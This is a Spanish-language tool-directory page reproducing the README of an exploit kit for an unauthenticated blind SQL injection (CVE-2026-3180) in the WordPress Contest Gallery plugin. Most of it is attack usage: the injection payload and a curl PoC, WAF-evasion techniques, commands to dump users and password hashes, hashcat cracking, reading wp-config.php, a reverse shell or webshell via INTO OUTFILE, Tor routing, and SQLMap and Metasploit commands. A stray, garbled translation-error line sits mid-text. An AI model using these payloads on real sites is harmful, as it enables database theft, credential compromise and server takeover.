Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WP-Contest-Gallery-28.1.4-Exploit — Kit de explotación completo para CVE-2026-3180 - Vulnerabilidad de inyección SQL en WordPress Contest Gallery. Incluye extracción automatizada de datos, evasión de WAF, shell inversa, integración con SQLMap, generación de extensiones de Burp e informes para pruebas de penetración e investigación de seguridad. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/wp-contest-gallery-28.1.4-exploit
Descifrado de ContraseñasEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónDesarrollo de Payloads
GitHubcerberusmrxi/wp-contest-gallery-28.1.4-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Kit de explotación completo para CVE-2026-3180 - Vulnerabilidad de inyección SQL en WordPress Contest Gallery. Incluye extracción automatizada de datos, evasión de WAF, shell inversa, integración con SQLMap, generación de extensiones de Burp e informes para pruebas de penetración e investigación de seguridad.

WP-Contest-Gallery-28.1.4-Exploit

Ver Repositorio
11hace 1 mesAún no revisado
Compartir
⚠️ En pruebas
Este PoC se está probando y refinando activamente. Las características pueden cambiar entre versiones.

CVE-2026-3180

WordPress Contest Gallery — Inyección SQL Ciega Sin Autenticar

Python Version CVSS License Platform

Herramienta de evaluación de prueba de concepto para CVE-2026-3180
Autor: Sudeepa Wanigarathna · Descubrimiento original: cardosource


[!IMPORTANT] Uso autorizado únicamente. Esta herramienta es para investigación en seguridad, educación y pruebas de sistemas que posea o para los que tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso.


Tabla de Contenidos

  • Descripción general
  • Detalles de la vulnerabilidad
  • Características
  • Instalación
  • Inicio rápido
  • Guía de uso
  • Referencia de comandos
  • Técnicas de inyección
  • Evasión de WAF
  • Extracción de datos
  • Integraciones
  • Cadena de ataque
  • Salida e informes
  • Docker
  • Integración CI/CD
  • Solución de problemas
  • Estructura del repositorio
  • Historial de versiones
  • Aviso legal
  • Autor y créditos

Descripción general

CVE-2026-3180 es una inyección SQL ciega sin autenticar de alta gravedad en el plugin Contest Gallery de WordPress. El fallo existe en el manejador AJAX post_cg1l_resend_unconfirmed_mail_frontend, donde el parámetro cgl_mail se pasa a una consulta SQL sin la sanitización adecuada.

Este repositorio proporciona un PoC completo en Python (v2.0) para que profesionales de seguridad autorizados validen el impacto, extraigan datos de WordPress, generen informes y se integren con herramientas estándar de la industria (SQLMap, Burp Suite, Nuclei).

wp

Detalles de la vulnerabilidad

Punto final afectado

CampoValor

Solicitud de prueba de concepto```http

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded

action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20

root@kitploit:~
### Referencias

- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [Artículo original (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)

---

## Características

### Explotación principal

| Capacidad | Descripción |
|---|---|
| Detección de vulnerabilidades | Pruebas booleanas, basadas en tiempo, basadas en errores, unión y consultas apiladas |
| Extracción ciega | Extracción de caracteres mediante búsqueda binaria por inferencia booleana |
| Volcado completo de datos | Usuarios, metadatos de la base de datos, opciones, plugins, temas, entradas, tablas |
| Shell SQL interactivo | Ejecutar consultas `SELECT` arbitrarias contra el backend |
| Extracción de wp-config.php | Intentos de `LOAD_FILE()` contra rutas comunes |
| Shell inversa | Escritura de webshell PHP mediante `INTO OUTFILE` / `DUMPFILE` (cuando esté permitido) |

### Evasión y rendimiento

| Capacidad | Descripción |
|---|---|
| Bypass de WAF | Más de 15 técnicas de codificación y ofuscación |
| Multihilo | Hilos de trabajo configurables para una extracción más rápida |
| Limitación de velocidad | Retardo configurable entre solicitudes |
| Lógica de reintento | Reintentos automáticos en fallos transitorios |
| Rotación de User-Agent | Huellas dactilares de navegador aleatorias por solicitud |
| Soporte de proxy | Proxies HTTP/SOCKS y Tor (`socks5h://127.0.0.1:9050`) |

### Informes e integraciones

| Capacidad | Descripción |
|---|---|
| Generación de informes | Informes JSON y HTML con resúmenes de extracción |
| Integración con SQLMap | Comando SQLMap autogenerado con tamperers |
| Extensión de Burp Suite | Generador + `burp_contest_gallery.py` independiente |
| Plantilla de Nuclei | Plantilla YAML para detección masiva |
| Módulo de Metasploit | Módulo auxiliar en Ruby (`contest_gallery_sqli.rb`) |
| Automatización de shell | Scripts Bash para flujos de trabajo basados en curl y SQLMap |

### Operativo

| Capacidad | Descripción |
|---|---|
| Salida CLI coloreada | Registro estructurado con niveles de gravedad |
| Seguimiento de progreso | Métricas en tiempo real (solicitudes, tiempos, velocidad de extracción) |
| Modos silencioso y detallado | Adecuado para scripts y depuración |
| Manejo de señales | Limpieza ordenada con `Ctrl+C` |
| Listo para Docker | Soporte de despliegue en contenedores |
| Listo para pipelines CI/CD | Códigos de salida y salida JSON para automatización |

---

## Instalación

### Requisitos previos

- Python **3.8+**
- `pip`
- Accesibilidad de red al objetivo(s) bajo prueba

### Herramientas externas opcionales

| Herramienta | Propósito |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | Inyección SQL automatizada |
| [Burp Suite](https://portswigger.net/burp) | Pruebas manuales y alojamiento de extensiones |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | Escaneo basado en plantillas |
| [Hashcat](https://hashcat.net/hashcat/) | Descifrado de hashes sin conexión |
| [Tor](https://www.torproject.org/) | Enrutamiento anónimo (`--proxy tor`) |

### Configuración```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2026-3180.py --help

Dependencias

Requeridas (tiempo de ejecución):```text requests>=2.31.0

root@kitploit:~
**Recomendado (de requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0

El exploit principal utiliza solo la biblioteca estándar de Python además de requests. Paquetes adicionales mejoran la salida y los informes.


Inicio Rápido

Reemplaza http://target.example con un objetivo de laboratorio o autorizado únicamente.

Verificar vulnerabilidad```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
### Explotación completa (detectar + extraer)```bash
python3 cve-2026-3180.py http://target.example

Volcar usuarios de WordPress```bash

python3 cve-2026-3180.py http://target.example --dump users

root@kitploit:~
### Shell SQL interactiva```bash
python3 cve-2026-3180.py http://target.example --sql-shell

Generar informe HTML```bash

python3 cve-2026-3180.py http://target.example --report html -o assessment.html

root@kitploit:~
### A través del proxy de Burp```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v

Guía de Uso

Solo escaneo de vulnerabilidades```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
Ejecuta detección booleana, basada en tiempo y basada en errores sin extracción completa.

### Extracción completa de datos```bash
python3 cve-2026-3180.py http://target.example --dump all

Extrae información de la base de datos, usuarios, opciones, plugins, temas, publicaciones, tablas y metadatos del sistema.

Dumps selectivos```bash

python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes

root@kitploit:~
### Shell SQL interactivo```bash
python3 cve-2026-3180.py http://target.example --sql-shell

sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]

sql> show tables ["wp_users", "wp_posts", "wp_options", ...]

sql> exit

root@kitploit:~
**Comandos del shell:**

| Comando | Descripción |
|---|---|
| `SELECT ...` | Ejecuta una consulta SQL y muestra el resultado |
| `show users` | Muestra los usuarios extraídos en caché |
| `show tables` | Muestra la lista de tablas en caché |
| `show database` | Muestra los metadatos de la base de datos en caché |
| `show config` | Muestra wp-config.php si fue extraído |
| `show options` | Muestra las opciones de WordPress |
| `show plugins` | Muestra los plugins activos |
| `help` | Lista los comandos disponibles |
| `exit` / `quit` | Salir del shell |

### Generación de informes```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json

# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html

Shell inversa (solo laboratorio autorizado)```bash

Terminal 1 — listener

nc -lvnp 4444

Terminal 2 — exploit

python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444

root@kitploit:~
> Requiere privilegio `FILE`, webroot escribible, y que `secure_file_priv` no bloquee la ruta de destino.

### Generación de comandos de SQLMap```bash
python3 cve-2026-3180.py http://target.example --sqlmap

O usa el script de automatización incluido:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example

root@kitploit:~
### Extensión de Burp Suite```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension

# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py

Plantilla de Nuclei```bash

python3 cve-2026-3180.py http://target.example --nuclei-template

Scan with generated template

nuclei -u http://target.example -t CVE-2026-3180.yaml

root@kitploit:~
### Automatización con Bash (sin Python)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example

Enrutamiento Tor```bash

Ensure Tor is running on 127.0.0.1:9050

python3 cve-2026-3180.py http://target.example --proxy tor

root@kitploit:~
### Ajuste de rendimiento```bash
python3 cve-2026-3180.py http://target.example \
  --threads 20 \
  --timeout 15 \
  --delay 0.1 \
  --retries 5 \
  -v

Referencia de comandos

Argumentos posicionales

ArgumentoDescripción
targetURL base de WordPress objetivo (ej. http://target.example)

Opciones de red

Opciones de salida

ArgumentoDescripción
--verbose, -vHabilitar registro de depuración
--quietSuprimir salida de consola
,

Modos


Técnicas de inyección

La herramienta prueba y utiliza automáticamente múltiples estrategias de inyección:

Plantillas de Payload

El PayloadManager rota a través de 12+ plantillas de inyección:```text 'OR//{condition}#@teste.com 'OR{condition}-- - ')OR{condition}# '))OR{condition}# 'OR//{condition}OR//'1'='1'# 'UNION//SELECT{condition}# ...

root@kitploit:~
### Algoritmo de Extracción Booleana

1. Confirmar vulnerabilidad mediante longitudes de línea base verdadero/falso  
2. Búsqueda binaria de `LENGTH()` del resultado de la consulta objetivo  
3. Búsqueda binaria de `ASCII(SUBSTRING(...))` por posición de carácter  
4. Ensamblar la cadena completa a partir de los caracteres extraídos  

---

## Bypass de WAF

Técnicas de ofuscación integradas aplicadas aleatoriamente o bajo demanda:

| Técnica | Descripción |
|---|---|
| `comment_obfuscation` | Reemplazar espacios con `/**/`, `/*!*/`, `-- `, `#` |
| `case_variation` | Mayúsculas/minúsculas aleatorias en caracteres alfabéticos |
| `url_encoding` | Codificación porcentual estándar |
| `double_url_encoding` | Codificación porcentual anidada |
| `hex_encoding` | Codificación hexadecimal estilo `%41` |
| `unicode_encoding` | Codificación Unicode estilo `%u0041` |
| `white_space_variation` | Tabulaciones, saltos de línea, avances de página en lugar de espacios |
| `keyword_obfuscation` | Dividir palabras clave: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | Concatenación con `CHAR()` mediante `\|\|` |
| `char_obfuscation` | Adición con `CHAR()` mediante `+` |

Ejemplo de payload transformado:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com

Extracción de Datos

Objetivos de Extracción

Forma del Objeto de Usuario Extraído```json

{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }

root@kitploit:~
### Descifrado de hashes de contraseñas (offline)

Después de la extracción, descifra los hashes phpass de WordPress con Hashcat:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json

# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

Integraciones

SQLMap

Comando generado (vía --sqlmap):```bash sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs

root@kitploit:~
### Burp Suite

1. Cargue `burp_contest_gallery.py` en **Extender → Extensions → Add**  
2. Abra la pestaña **CVE-2026-3180**  
3. Introduzca la URL objetivo y haga clic en **Exploit**  
4. El escáner pasivo verifica las solicitudes AJAX en busca de indicadores de Contest Gallery  

### Nuclei```yaml
id: CVE-2026-3180
info:
  name: WordPress Contest Gallery SQL Injection
  severity: high
  classification:
    cve-id: CVE-2026-3180
    cvss-score: 7.5

requests:
  - method: POST
    path: /wp-admin/admin-ajax.php
    body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"

Metasploit```bash

Copy module to Metasploit

cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/

Run

msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"

root@kitploit:~
---

## Cadena de Ataque```mermaid
flowchart TD
    A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
    B --> C{"Injection type?"}
    C -->|Boolean| D["Response length inference"]
    C -->|Time| E["SLEEP delay inference"]
    C -->|Error| F["SQL error leakage"]
    D --> G["Binary-search extraction"]
    E --> G
    F --> G
    G --> H["WordPress data exfiltration"]
    H --> I["Users / hashes / options / config"]
    I --> J["Optional: OUTFILE webshell"]

Resumen Técnico

  1. Punto de entrada — Acción AJAX post_cg1l_resend_unconfirmed_mail_frontend en el plugin Contest Gallery.
  2. Sumidero — Valor cgl_mail concatenado en SQL sin parametrización.
  3. Explotación — Inferencia booleana ciega extrae datos carácter por carácter.
  4. Impacto — Acceso completo de lectura a la base de datos de WordPress; posible escritura de archivos si los privilegios de MySQL lo permiten.

Salida e Informes

Salida de Consola```text

[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!

root@kitploit:~
### Estructura del informe JSON```json
{
  "metadata": {
    "cve": "CVE-2026-3180",
    "cvss_score": "7.5 (High)",
    "type": "boolean_based"
  },
  "target": {
    "url": "http://target.example",
    "ajax_url": "http://target.example/wp-admin/admin-ajax.php"
  },
  "vulnerability": {
    "vulnerable": true,
    "type": "boolean_based"
  },
  "extracted_data": {
    "database": { "name": "wordpress", "version": "8.0.35" },
    "users": [],
    "tables": [],
    "plugins": [],
    "options": {}
  },
  "summary": {
    "users_found": 3,
    "tables_found": 12,
    "plugins_found": 8,
    "config_extracted": false
  }
}

Los informes se guardan en reports/ por defecto.


Docker```dockerfile

FROM python:3.11-slim

WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt

ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]

root@kitploit:~
I can't proceed because no content was provided after "INPUT:". Please include the Markdown text to translate.```bash
# Build
docker build -t cve-2026-3180 .

# Scan
docker run --rm cve-2026-3180 http://target.example --scan

# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
  http://target.example --report json

Integración de CI/CD

Ejemplo de flujo de trabajo de GitHub Actions para escaneos de staging autorizados:```yaml name: CVE-2026-3180 Staging Scan

on: workflow_dispatch: schedule: - cron: '0 2 * * 1'

jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4

root@kitploit:~
  - uses: actions/setup-python@v5
    with:
      python-version: '3.11'

  - run: pip install -r requirements.txt

  - name: Vulnerability scan
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --scan --quiet
    continue-on-error: true

  - name: Generate report
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --report json -o reports/staging.json

  - uses: actions/upload-artifact@v4
    with:
      name: security-report
      path: reports/
root@kitploit:~
## Solución de problemas

| Síntoma | Qué probar |
|---|---|
| El objetivo no es vulnerable | Confirmar que Contest Gallery ≤ 28.1.4 está instalado y activo |
| Sin diferencia en la longitud de la respuesta | Prueba `--scan` para fallback basado en tiempo; aumenta `--timeout` |
| Extracción muy lenta | Aumenta `--threads`; reduce `--delay` con precaución |
| Errores de conexión | Aumenta `--timeout` y `--retries`; verifica la configuración del proxy |
| WAF bloquea peticiones | Usa `--proxy tor`; la herramienta aplica técnicas de bypass automáticamente |
| El proxy Tor falla | Verifica Tor en `127.0.0.1:9050`; instala `requests[socks]` si es necesario |
| El volcado de usuarios está vacío | Es posible que el prefijo de tabla no sea `wp_`; usa `--sql-shell` con consultas personalizadas |
| wp-config no encontrado | Prueba `--sql-shell` con rutas alternativas de `LOAD_FILE()` |
| Falla de reverse shell | Verifica el privilegio `FILE`, `secure_file_priv`, permisos del webroot |

### Flujo de trabajo de depuración```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v

# Through Burp
python3 cve-2026-3180.py http://target.example \
  --proxy http://127.0.0.1:8080 -v --scan

# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
  -d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
  -w "\nSize: %{size_download}\n"

Estructura del Repositorio```text

exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)

root@kitploit:~
---

## Historial de versiones

### v2.0.0 — Edición Definitiva (Enero de 2026)

- Detección de inyecciones booleanas, temporales, de error, UNION y apiladas
- Pipeline completo de extracción de datos de WordPress
- Más de 15 técnicas de evasión de WAF
- Shell SQL interactivo
- Generación de informes JSON/HTML
- Integraciones con SQLMap, Burp y Nuclei
- Shell inversa mediante `INTO OUTFILE`
- Soporte para proxy y Tor
- Multihilo con lógica de reintento
- Salida coloreada y registro estructurado

### v1.0 — Lanzamiento inicial

- Detección básica de booleanos
- Extracción manual de usuarios

---

## Descargo de responsabilidad

Este proyecto se proporciona **tal cual** para **investigación de seguridad defensiva** y **pruebas de penetración autorizadas**.

Al utilizar este software, usted acepta que:

1. Solo atacará sistemas propios o que tenga autorización explícita para probar.
2. Comprende las leyes aplicables de abuso informático y protección de datos.
3. El autor y los colaboradores **no son responsables** de daños, pérdida de datos o consecuencias legales derivadas del mal uso.

Si descubre esta vulnerabilidad en producción, siga las prácticas de divulgación responsable y coordine con el proveedor del plugin / el equipo de seguridad de WordPress según corresponda.

---

## Autor y créditos

| Rol | Nombre |
|---|---|
| **Autor de la herramienta** | Sudeepa Wanigarathna |
| **Descubrimiento original** | cardosource |
| **CVE** | CVE-2026-3180 |
| **Licencia** | MIT |

---

## Licencia

MIT```
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

Soporte

  • Dale estrella al repo si te ayuda en tu investigación
  • Abre issues para bugs, falsos positivos o mejoras de detección
  • Pull requests bienvenidos para documentación, técnicas de evasión de WAF y UX en entornos autorizados

Solo para pruebas de seguridad autorizadas.

Descargar herramienta
AtributoValor
CVE IDCVE-2026-3180
CVSS7.5 (Alta)
Vector de ataqueRed — sin autenticar
ImpactoViolación de confidencialidad, lectura de base de datos, robo de credenciales
Producto afectadoWordPress Contest Gallery plugin
Versiones afectadas28.1.4 y anteriores
Tipo de vulnerabilidadInyección SQL ciega
DBMSMySQL / MariaDB
URL/wp-admin/admin-ajax.php
MétodoPOST
Acciónpost_cg1l_resend_unconfirmed_mail_frontend
Parámetro vulnerablecgl_mail
HerramientaDescripciónRequiere Bash v4+
1.1 - CloakifyExfiltración de datos mediante diversas técnicas de codificación.Sí
1.2 - DET (Data Exfiltration Toolkit)Prueba de exfiltración de datos sobre varios protocolos.No
1.3 - Egress-AssessPrueba de capacidades de transferencia de datos de salida.No
1.4 - pwnbinpwnboard para pobres, rastrea la exfiltración a través de pastebins públicos.No
1.5 - USB-Rubber-DuckyPayloads de USB Rubber Ducky para exfiltración de datos.No
sql> SELECT DATABASE()
wordpress
ArgumentoPor defectoDescripción
--proxy—URL de proxy o tor para SOCKS5 vía Tor
--timeout10Tiempo de espera de petición HTTP (segundos)
--delay0.05Retardo entre peticiones (segundos)
--retries3Número de reintentos en peticiones fallidas
--threads, -t5Tamaño del grupo de hilos
--output
-o
Ruta de archivo de salida personalizada
ArgumentoDescripción
(por defecto)Exploit completo: detectar → escanear → extraer todo
--scanSolo detección de vulnerabilidades
--sql-shellShell SQL interactivo
--dump {users,config,database,options,plugins,themes,all}Extraer datos específicos
--report {json,html}Generar informe de evaluación
--reverse-shell LHOST LPORTIntentar reverse shell mediante escritura de archivo
--sqlmapImprimir comando de SQLMap
--burp-extensionGenerar extensión de Burp Suite
--nuclei-templateGenerar plantilla YAML de Nuclei
TipoMétodo de detecciónCaso de uso
Basado en booleanosDiferencial de longitud de respuesta (1=1 vs 1=2)Motor de extracción principal
Basado en tiempoInferencia de retardo SLEEP()Alternativa cuando las señales booleanas son débiles
Basado en erroresEXTRACTVALUE() / cadenas de error SQLMetadatos rápidos cuando se filtran errores
Basado en UNIONPayloads UNION SELECTRecuperación directa de valores (cuando sea aplicable)
Consultas apiladasSintaxis '; ... #Ejecución de múltiples sentencias (raro)
ObjetivoFuente SQLClave de Salida
Nombre de la base de datosSELECT DATABASE()database.name
Versión de la BDSELECT VERSION()database.version
Usuario de la BDSELECT USER()database.user
Tablasinformation_schema.TABLEStables[]
Columnasinformation_schema.COLUMNScolumns{}
Usuarios de WPwp_usersusers[]
Hashes de contraseñaswp_users.user_passusers[].password_hash
Correos electrónicoswp_users.user_emailusers[].email
Roleswp_usermeta capabilitiesusers[].roles
Opciones del sitiowp_optionsoptions{}
Plugins activoswp_options.active_pluginsplugins[]
Temasopciones template / stylesheetthemes[]
Entradaswp_postsposts[]
wp-config.phpLOAD_FILE('/var/www/html/wp-config.php')config
Información del sistema@@hostname, @@datadir, etc.system_info{}